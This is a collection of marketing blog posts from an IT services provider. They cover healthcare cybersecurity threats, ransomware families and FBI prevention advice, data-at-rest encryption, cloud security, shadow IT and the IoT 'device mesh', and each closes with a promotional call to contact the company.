There are many exciting opportunities that come with the digital economy. In order to realize the benefits, you need a partner who will ensure your infrastructure is not only optimized but also protected. At OneNeck® IT Solutions, our qualified engineers can work with you to determine your unique security risks and develop a plan to address those risks and defend your network. As a complete hybrid IT solutions provider, we implement security best practices as an integral part of your network, data center, collaboration and mobility solutions.

The healthcare IT market is expected to double — reaching a projected $280 billion by 2020. The federal portion of national healthcare spending, according to the Federal government, will grow 86%, from $920 billion in 2015 to $1.7 trillion by 2025. Deltek’s Federal Health Information Technology Market report states that as the need for improvements in healthcare quality, interoperability and privacy grows, federal agencies acting as payers, promoters and providers will continue to invest in technologies and solutions to improve health outcomes and reduce waste, fraud and abuse.

Electronic patient records, new healthcare applications, connected medical devices and regulatory/compliance changes, such as the HITECH Act, MACRA, and the 21st Century Cures Act, are making it easier for doctors to share patient records, affect patient outcomes and increase the quality of care, but are also contributing to an explosion in healthcare data. Top federal health IT areas of focus include data standardization, data integrity, information exchange, interoperability, analytics, storage, infrastructure modernization, legacy system modernization, cloud adoption, telehealth and mobile applications.

This rapid growth is enabling innovation and changing patient expectations, but posing significant challenges for IT to meet demands. As Government agencies like the VA and DoD move to modernize and digitalize systems, the growth of big data and information sharing is heightening risk.

Healthcare agencies need to not only deliver improved care and patient experience but also ensure that patient data and privacy are protected.

Healthcare IT Threat Landscape

According to the Ponemon Institute, the top cyber threats for healthcare organizations in 2016 were ransomware, malware, and denial of service (DDoS). Many cybersecurity experts consider ransomware the fastest-growing threat across all industries, but healthcare organizations are especially vulnerable due to their need for uptime and willingness to pay.

In 2016, we saw a record number of attacks on healthcare organizations, such as Bon Secours and Hollywood Presbyterian, and so far 2017 is following suit.

Other threats include:

• Medjacking: The Hospira insulin pump and St. Jude cardiac devices are examples of how hackers could take advantage of medical devices with security vulnerabilities.
• The Internet of Medical Things: From wearable patient devices to remote monitoring apps, more endpoints are connecting to healthcare networks. Each represents a new potential entry point for hackers.
• Insiders: The majority of data breaches are caused by compromised accounts and IT professionals need to pay attention to not only malicious insiders but also risks resulting from human error.

Combating Healthcare Threats

Healthcare IT must design a plan that takes a holistic approach to data security and combines technology, people and processes.

• Follow Industry Standards: NIST, a cybersecurity framework of standards, guidelines, and best practices created through a collaboration between industry and government to promote the protection of critical infrastructure is a good starting point for government health IT.
• Institute Workforce Training: There also needs to be more emphasis on workforce training on current threats, how to spot malicious links and detect phishing attempts has been proven to significantly reduce this common threat.
• Update Legacy Technology: Legacy technology is among the biggest challenges for government healthcare IT. Organizations need to find and patch all vulnerabilities resulting from applications and systems that are no longer supported and make a plan to update and modernize technology where feasible.
• Employ Encryption: All data should be encrypted whether at rest or in motion. The case of Denton Heart Group is case in point. An unencrypted hard drive that contained seven years of backup electronic health record data was stolen exposing over 200,000 patient records.

Creating an IT Healthcare Plan

Today’s healthcare CIOs must balance stringent security and privacy regulations with a need to meet consumer demands and provide an excellent patient experience. As healthcare IT leaders depend on technology investments to modernize the healthcare experience and differentiate their organization they must not lose sight of security concerns.

OneNeck IT Solutions is committed to helping our customers support best practices, mitigate costs, improve service levels and meet industry compliance regulations. Our experts have a broad degree of experience working with healthcare organizations to improve efficiency and agility while providing the highest level of protection for healthcare data.

Q.  Many experts maintain that the total cost of ransomware in 2016 was over a billion dollars – that’s a staggering number. With the rate of sophisticated security attacks increasing at an alarming rate, how can an organization protect themselves from data leaks and/or malicious security attacks?

A. Focus on the basics. Make sure servers and workstations are properly patched, as known vulnerabilities that are years old continue to be a threat to companies (2016 Data Breach Investigations Report from Verizon).  Constantly communicate and educate with your user base regarding the risks of malware and other fraud.  And finally, be prepared with a plan, backups and other contacts for when something bad happens.

Q. Why are identity, credential and access management so critical in combatting today’s security threats?

A. Credentials can be one of the weakest links to an environment. According to the Verizon Report, 63% of confirmed data breaches involved weak, default or stolen passwords. 

So, start with the base philosophy of two fundamental principles: Least Access and Least Privilege.

• Least Access: Users shall be granted access only to those information assets necessary to perform their duties.
• Least Privilege: Users shall not be permitted any more than the least privileges necessary for processing the information assets to which they have been granted access.

Use and enforce good password practices (SANS Password Protection Policy).  And invest in multi-factor authentication for your access into your core environment and critical systems.

Q. With the vast majority of enterprise businesses leveraging the cloud, it’s no surprise that securing the critical data that’s moving to the cloud is top of mind. What security considerations should an organization keep top of mind when evaluating a cloud provider?

A. Get to know the vendor and their operations. Talk to the cloud service provider’s head of security, and understand their approach – what keeps them up at night.  Do your due diligence get updated copies of compliance reports that the vendor provides. And finally, start small and invest in penetration testing and vulnerability scans of your environment.

Q. By enabling the convenience of “anywhere, anytime,” we’ve seen an emergence of Shadow IT, where LOBs are bypassing IT in order to get things done. What recommendations would you give today’s frustrated IT teams struggling to retain control and keep the infrastructure secure, all while dealing with rouge cloud services?

A. Security is all about risk management, and we have to be here to support the business in the tools and timing they need to get things done. The most important aspect is communication so you can at least do an assessment on what is being used by the business, how is it being accessed and who is handling the account management, what data is involved both transit and at rest, and what security do the cloud services have in place.  Get it documented, and have the business sign off.

Q. As a provider of cloud, colocation and various advanced IT services, OneNeck has to keep security front and center to ensure we’re not putting our customers at risk. In your role as OneNeck’s VP of Information Security and Business Applications, what are you and your team doing to ensure the security of OneNeck’s customer data?

A. Most important, staying involved with our customers and our operations to know what challenges they are dealing with and keeping them informed of risks to their business. We stay involved in the industry and with our vendors, to be aware of threats, how to prevent them or at least quickly detect  and address any issues. And of course, leveraging the experience throughout the family of TDS companies to constantly evaluate and improve our security practices.

Sensitive business data at rest in the cloud is more vulnerable than ever before.  Ensuring that this critical corporate data is secure against unauthorized access and meets any organizational policies, industry or government regulations, is of critical importance to many CIOs.

What is data at rest?

Data at rest is data that is not actively moving from device to device or network to network such as data stored on cloud severs. Encrypting this sensitive data stored in the cloud — data-at-rest — prevents unauthorized physical access to the data. Many compliance standards, such as the Health Insurance Portability and Accountability Act (HIPAA), require this security control to be in place to tightly-guard patient information.

Whether you are storing data at rest in a private or public cloud, DARE is a critical component of the overall security posture for sensitive data. It’s increasingly more important in cloud environments that are inherently multi-tenant architectures.

How DARE Works

DARE secures your critical data even when the media is removed from the array. Many DARE Solutions, utilize a high performance inline encryption technique to ensure that all data stored on the array is unusable if the SSD media is removed. This prevents unauthorized access in the event of theft or loss during transport, and makes it possible to return/replace failed components containing sensitive data.

In addition, XtremIO SEDs use the hardware-based Advanced Encryption Standard (AES) 256 encryption algorithm. AES is a widely-used block encryption standard, and is acceptable by the most rigorous regulations and federal governments’ standards. 

When OneNeck was rigorously testing various All-Flash technologies, we ultimately found that for our customers, the ability to provide DARE with ZERO impact to application performance was a win-win for us and our customers. 

That alone was worth it, but this unique solution provides one more huge benefit.  With this technology, we are able to add one more layer of security, specifically this technology provides DARE without OneNeck having to manage encryption keys in any way, this is critical as some technologies require external encryption keys, which can be lost or stolen, resulting in data unavailability or providing malicious users with access to what was supposed to be protected data.

This means the best of both worlds for our customers, incredible application performance, along with powerful Data At Rest Encryption.

Does your Cloud Provider DARE?

A recent study of 12,000 cloud providers conducted by Skyhigh, a leading cloud access security broker, found that only 9.4% of cloud providers are encrypting data at rest. That’s pretty unnerving when you consider that the cloud is now home to a significant amount of sensitive corporate data.

Trust is especially important when discussing data security. At OneNeck IT Solutions, we understand that data is the lifeblood of your organization and protecting it is paramount. Leveraging data encryption at rest technology and ReliaCloud®, our enterprise- class hosted private cloud solution, OneNeck encrypts our customer’s data stored at rest by default, with no additional action required from you and no impact on the performance you expect to achieve on our Cloud platform

If you’re serious keeping your at rest data secure in the cloud, then give us a call today.

From hospitals and government agencies, to enterprise organizations and everyday business owners, to private citizens— it seemed like no one was immune from ransomware in 2016. As we are now well into 2017, we’re continuing to see alarming rates of ransomware attacks that encrypt data or lock digital files until a ransom is paid.

As the concept has existed for over 20 years, ransomware isn’t new, but it is increasing in frequency and sophistication. According to the FBI, law enforcement has seen a large increase in ransomware since 2015, with a larger focus on enterprise organizations that can be extorted for greater ransom. The trend is also showing that even when organizations pay, they may not fully recover their data.

The loss of access to critical data leaves its victims with two choices, either fork over the ransom or face massive disruption. These attacks are so successful because most organizations choose to pay. Even those who employ continuous backups and choose not to pay will take a hit to their reputation, lose data and face business continuity upset while they restore their systems.

The Face of Ransomware

Ransomware is a prolific form of malware, and it’s becoming more sophisticated. The days of a simple spam campaign through email are gone and spear phishing, malvertising and social engineering are fooling end users. We now have more notorious ransomware families to worry about:

• Reveton: Since 2012, Reveton has spread. Masquerading as a law enforcement warning of illegal online activities, cybercriminals use scare tactics to extort funds.
• CryptoLocker: Spread through Gameover ZeuS botnet, Cryptolocker has wreaked havoc by infecting around 150,000 computers a month at its peak. With this ransomware, the malware is easily removed, but important files remain scrambled with virtually unbreakable encryption.
• CryptoWall: This variant proves our claim that threats are becoming more sophisticated. Similar to CryptoLocker, CryptoWall is disseminated through multiple infection vectors, including browser exploit kits, malicious email attachments, and drive-by downloads.
• CTB Locker: Using persistent Elliptic Curve Cryptography, CTB Locker files are encoded with a unique RSA key.
• TorrentLocker: This file-encrypting ransomware relies almost entirely on spam email for its distribution. Unlike typical spam campaigns, the cybercriminals behind this attack focus on grammar to appear as authentic. Once inside, the campaign harvests emails to further distribute the ransomware.
• TeslaCrypt: The famously vulnerable Adobe Flash was first used in this ransomware to exploit online gamers and then moved on to larger targets including several high-profile European companies.
• Locky: As the newest ransomware on the list, Locky has created a lot of noise recently. Requiring bitcoin, it recently extorted a hospital in Hollywood for around $17,000 dollars.

Don’t Fall Victim to Ransomware Attacks

To protect you and your business continuity, the FBI suggests the following:

• Focus on Prevention
• Educate employees on ransomware types and tactics.
• Reduce vulnerabilities through timely patching and software updates.
• Set up automatic updates and regular scans of antivirus and anti-malware solutions.
• Employ least privileges and keep admin access to the bare minimum.
• Configure access controls, including file, directory and network share permissions. Read Only access should be the standard, with Write privilege granted sparingly.
• Disable macro scripts for office files transmitted over email.
• Implement policies that restrict programs from executing in common ransomware locations.
• Steps for Business Continuity
• Continuously backup files and be sure to frequently check the integrity of backups.
• Secure backups by ensuring they aren’t connected to the computer and networks they are replicating.

When the FBI gets involved, you know that it’s a big threat to security. Ransomware is gaining attention and rightfully so. With the predicted growth, you don’t want to be caught off guard without the right plan and security policies.

According to FBI Cyber Division Assistant Director James Trainor, “There’s no one method or tool that will completely protect you or your organization from a ransomware attack. But contingency and remediation planning are crucial to business recovery and continuity—and these plans should be tested regularly.”

Not sure where to start securing your organization? We’re here to help. Contact us to discuss the risks with one of our security experts. They can guide you in assessing your risks and creating a plan to stay ahead of them, before it’s too late.

As organizations push their workloads into the cloud, IT is losing control over the security of their infrastructures. With the Internet of Things (IoT) and mobile applications thrown into the mix, more data resides off-premises, leaving IT in a big dilemma as to how to best protect company data. This means that IT needs to adapt their security approach to ensure that enterprise data is safe and secure, regardless of where it resides.

Challenging the Legacy Model of Security

According to the recent PwC Global State of Information Security Survey 2017, 63 percent of organizations run IT functions in the cloud. With more cloud-based services and applications that sit outside of the firewall, combined with an increasingly mobile workforce who expects anytime, anywhere access to data, we can no longer distinguish what is “inside” vs. what is “outside” the perimeter. The methodology of using a perimeter-based security approach is no longer effective for enterprise security.

Cyberattacks were identified by 29 percent of organizations surveyed who reported having lost data in the last year. Not only is it more difficult to define the perimeter, it is even more difficult to defend it. Malicious insiders, advanced persistent threats, malware containing malicious links, over-privileged users and the increased threat from ransomware and DDoS attacks have escalated the need for improved cybersecurity measures.

To be effective, IT needs to look beyond physical walls to extend to the cloud and examine the endpoints that are now a big part of the equation.

The Danger of Cybersecurity Complacency

According to Dell EMC’s Global Protection Index 2016, nearly half of IT decision-makers who responded to the survey felt that not all the data stored in the cloud by their organization was protected. The survey further finds that more than 80 percent indicated they rely on SaaS-based business applications, and while 29 percent of their organization’s IT environment is in the public cloud, on average nearly half (47 percent) of organizations believe that not all of their data stored in the cloud is protected.

Three factors likely contribute to that uncertainty:

• With the shift to the cloud, many organizations don’t know exactly where their data resides.
• IT teams need to play a more active role in ensuring the security of corporate data in the cloud.
• Shadow IT has created vulnerabilities resulting from a lack of access control.

Protecting Enterprise Data

The first step to determining your organization’s risk is to take a full inventory of what cloud services employees are using and how they are using those services. Once you gain visibility into your cloud landscape, it’s time to ensure you have optimal controls in place:

• Automation: When a workload is launched, it needs to be automatically protected, just as it would be if the workload resided on the perimeter.
• Personalization: While universal policies should be applied, each workload type should have its own additional policies, based on factors such as the sensitivity of data and regulatory context.
• Pre-built: The controls should be pre-built into a template so that the developer doesn’t need to continuously investigate which security protocols apply to the new workloads.

Choosing a Cloud Provider

Your cloud provider must be a true partner. It’s important to ensure the service-level agreement (SLA) protects your organization while outlining the duties and responsibilities of each party. Protections you should expect from a cloud provider include measures such as:

• Data center physical security, employee screening and training
• Protocols for regular patching, software updates and system upgrades
• A security model that assigns network permissions, authenticates user permissions prior to accessing resources
• A data map that shows where data resides to properly protect sensitive data
• Defense in-depth, on-premises cybersecurity model applied in the cloud

With a cloud provider as a true partner, organizations can then focus on enterprise-specific concerns such as user management, including authentication protocols and workload separation based on data sensitivity.

The cloud is indeed a game-changer for today’s enterprises. While security continues to be a concern, with a properly executed and comprehensive strategy, cloud adoption can become an enabler rather than a burden. Not sure where to start? Contact us today for a complimentary cloud readiness assessment to help you gain control over your cloud and keep your data safe.

The use and adoption of cloud computing are on the rise as more and more companies come to understand the massive advantages of doing business in the cloud. Particularly popular are hybrid cloud solutions that allow users to reap the benefits of both on-premises and cloud technologies at the same time. However, this cloud computing boom has also created new worries for companies in the form of Shadow IT.

The very term “Shadow IT” seems to suggest something terrifying and mysterious, lurking and waiting until one day it destroys your business. While the reality isn’t quite that dramatic, shadow IT still represents a significant concern and challenge for companies who seek to use cloud services. So, what is it, and how can you best address it at your organization?

What Is Shadow IT?

“Shadow IT” refers to the tools, technologies and devices that are used at a company without the explicit permission or knowledge of the IT department. In an era when many employees are allowed to “bring your own device” (BYOD) to work, and when results-driven startups encourage workers to use any means necessary to solve a problem, shadow IT has become an all-too-common solution to the common frustrations of using officially sanctioned IT tools.

Although Shadow IT has always presented a problem for companies whose own employees are leaving them in the dark, the risks have been heightened by the recent popularity of hybrid cloud solutions. Many companies choose a hybrid solution because compliance and security policies require them to keep sensitive data on premises. However, Shadow IT violates the assumptions that this information will be kept in a controlled environment and increases the chances of a data leak, whether intentional or unintentional.

How Can You Deal with Shadow IT?

Shadow IT presents new challenges for your company, but there are methods and strategies to combat it.

• First, realize that the presence of shadow IT is like an iceberg, a problem on the surface that hides a larger concern beneath. Find out why your employees felt it necessary to bypass the IT department in the first place and come up with solutions to these underlying issues. Was it the slowness and bureaucracy in your company? Are your employees’ current tools and devices insufficient for their jobs?
• Second, monitor your network to identify new and unknown devices that may be hinting at the presence of Shadow IT. Often, this can be done with your current security setup, including firewalls, proxies, and security information and event management (SIEM) software. These tools can provide you with valuable information, such as the cloud services being used at your company, who uses them and how much data is being uploaded and downloaded.
• Third, be willing to be flexible. Although there are certain situations where Shadow IT presents an unacceptable risk to your company’s sensitive data, other instances of Shadow IT are simply employees trying to stay ahead of the technological curve. If you discover shadow IT in your midst, you might wish to permit it in the short term depending on the circumstances. This lets your business continue as normal and lets you explore adding these verboten tools to your company’s officially approved toolbox. In addition, if your employees are trying to make their files available outside of work, consider building a mobile-accessible solution that allows them to work remotely while keeping your data secure.

Final Thoughts

Shadow IT, or any other potential complications of cloud computing, shouldn’t make you run screaming from hybrid cloud. Embrace the many benefits that cloud services can bring your company, but be mindful of shadow IT and the need for proper governance. If you’re not sure how to start addressing the problem of Shadow IT at your organization, try a Cloud Consumption Assessment.

The next major technology trend is emerging – the device mesh is said will merge the physical and virtual worlds. Thanks to the Internet of Things (IoT), more and more devices are connecting. Worldwide, there are now a total of 1.2 billion LTE subscriptions—and that number is constantly increasing. By 2021, an estimated 28 billion devices will be connected to the Internet.

So, what is the device mesh? The device mesh is an expanding set of endpoints—mobile, wearable, consumer, home electronics, automotive and environmental devices, including sensors in the IoT—that people and businesses will use to reach applications and information or interact with others. Previously our sensors merely reported the collected data back to a single database. But now, apps are starting to talk with each other directly, and the endpoints we use to access our information and applications are starting to work in tandem with one another. This means that we are moving towards a huge network landscape that Gartner identified as one of the Top 10 Strategic Technology Trends for 2016.

Before IoT, apps were downloaded to smartphones or tablets, and a person would open the app whenever they wanted to use it, meaning the app would operate on command only. In the new device mesh environment, as soon as you turn on a phone or device, an app will start to work quietly in the background, using data imputed from a number of other applications. One need only look at the hype surrounding Pokémon Go to see an example of device mesh in action.

Some have dubbed the new era as “post-app” or “post-mobile.” However, it may be more accurate to suggest that we are entering an era in which apps and mobile devices are so interactive that their operations will permeate every aspect of everyday life. For everyday users, the practical effects of device mesh are that their experiences of technology will become even more personalized.

As app integration becomes the norm, users will no longer need to concern themselves with app compatibility. Apps will work together invisibly, operating as users require. With an ambient user experience, users will actually spend less time finagling with individual apps. Instead, mobile devices can act as true personal assistants, working in the background to fulfill needs and provide services.

The potential of this technology offers numerous applications for businesses. In this new environment, companies will be able to provide personalized experiences to customers and employees. However, there are undoubtedly legal and privacy concerns that will need to be approached carefully.

Device mesh is coming—indeed, in some ways, it is already here. To navigate these new waters, companies need a trusted partner to help them understand the risks and make the right choices for their organization. Not sure where to start? Talk to one of our mobility experts today.